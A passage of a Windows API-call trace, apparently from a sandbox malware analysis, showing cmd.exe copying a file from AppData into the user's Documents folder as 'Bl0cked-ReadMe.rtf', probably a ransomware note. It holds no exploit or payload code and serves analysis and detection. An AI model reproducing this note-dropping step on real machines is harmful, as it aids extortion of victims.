lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x40, 
lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegCloseKey (hKey=0x40) returned 0x0 [0232.431] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee7e4 | out: phkResult=0x1ee7e4*=0x40) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x40, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x1, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x0, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x4, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x4) returned 0x0 [0232.431] RegQueryValueExW (in: 
hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee7ec, lpData=0x1ee7f0, lpcbData=0x1ee7e8*=0x1000 | out: lpType=0x1ee7ec*=0x0, lpData=0x1ee7f0*=0x9, lpcbData=0x1ee7e8*=0x1000) returned 0x2 [0232.431] RegCloseKey (hKey=0x40) returned 0x0 [0232.431] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.432] srand (_Seed=0x5b8863c0) [0232.432] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0232.432] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0232.432] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.432] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2618c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.432] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.433] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.433] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.433] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.433] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.433] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.433] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.433] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.433] _wcsicmp 
(_String1="PROMPT", _String2="TIME") returned -4 [0232.433] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.433] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.433] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.433] GetEnvironmentStringsW () returned 0x2622b8* [0232.433] FreeEnvironmentStringsW (penv=0x2622b8) returned 1 [0232.433] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.433] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.433] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.433] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.433] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.433] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.433] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.433] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.433] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.433] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.433] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef5b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.434] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef5b0, lpFilePart=0x1ef5ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef5ac*="Desktop") returned 0x18 [0232.434] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.434] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c) returned 0x25fff8 [0232.434] FindClose (in: hFindFile=0x25fff8 | out: hFindFile=0x25fff8) returned 1 [0232.434] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c) returned 0x25fff8 [0232.434] FindClose (in: hFindFile=0x25fff8 | out: hFindFile=0x25fff8) returned 1 [0232.434] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef32c | out: lpFindFileData=0x1ef32c) returned 0x25fff8 [0232.434] FindClose (in: hFindFile=0x25fff8 | out: hFindFile=0x25fff8) returned 1 [0232.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.435] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.435] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.435] GetEnvironmentStringsW () returned 0x262ad8* [0232.435] FreeEnvironmentStringsW (penv=0x262ad8) returned 1 [0232.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.436] GetConsoleOutputCP () returned 0x1b5 [0232.436] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.436] GetUserDefaultLCID () returned 0x409 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="0") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="0") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef6f0, cchData=128 | out: lpLCData="1") returned 2 [0232.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.437] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.437] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.437] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.438] GetConsoleTitleW (in: lpConsoleTitle=0x2508d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.438] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.438] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.438] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.439] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.439] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.439] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.439] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.439] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.440] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.440] _wcsicmp (_String1="REM/?", 
_String2="type") returned -2 [0232.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.444] GetFileType (hFile=0x7) returned 0x2 [0232.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef5e8 | out: lpMode=0x1ef5e8) returned 1 [0232.692] _dup (_FileHandle=1) returned 3 [0232.693] _close (_FileHandle=1) returned 0 [0232.693] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0232.693] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef5b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0232.693] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0232.693] GetConsoleTitleW (in: lpConsoleTitle=0x1ef3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.693] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0232.693] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0232.693] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0232.693] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0232.694] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.694] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1eef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eef4c) returned 0x250e50 [0232.695] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0232.695] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0232.695] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0232.695] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ede58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0232.695] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.695] GetFileType (hFile=0x54) returned 0x1 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.695] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1edeb0 | out: lpFileSizeHigh=0x1edeb0*=0x0) returned 0x1632 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.695] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.696] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.696] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.696] GetFileType (hFile=0x4c) returned 0x1 [0232.696] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.696] GetFileType (hFile=0x4c) returned 0x1 [0232.696] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.696] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: 
hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, 
nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.698] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.698] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.699] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.699] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 
[0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, 
lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.700] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.700] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c 
